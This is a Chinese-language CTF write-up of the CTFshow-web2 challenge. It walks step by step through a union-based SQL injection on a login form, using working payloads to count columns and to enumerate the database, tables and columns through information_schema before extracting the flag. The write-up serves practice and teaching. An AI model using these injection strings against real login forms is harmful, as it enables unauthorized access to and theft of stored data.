CTFshow-web2

作者:xiaowu 日期: 分类:xiaowuCTF 浏览:1350

首先打开链接,是一个登录页面,url无参数,初步判断个POSTsql注入

image.png

使用burp抓包,观察到post可注入

image.png

推测sql语句为

 select *** from user where username=? and password=?

用户名框输入

admin' or 1=1  order by 3 #

判断字段为3

image.png

再输入

admin' or 1=1 union select 1,2,3#

爆出回显为2

image.png

再输

admin ' or 1=1 union select 1,database(),3;#

爆出数据库名

image.png


 接着输入

admin ' or 1=1 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='web2'),3;#

group_concat 是为了将查询结果连接成一个字符串输出

爆出表名

image.png

继续输

admin' or 1=1 union select 1,(select group_concat(column_name) from information_schema.columns where table_name= 'flag' ),3 #

得出列名

image.png

最后

admin ' or 1=1 union select 1,(select flag from web2.flag),3 #

image.png

关键词:

网友评论

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。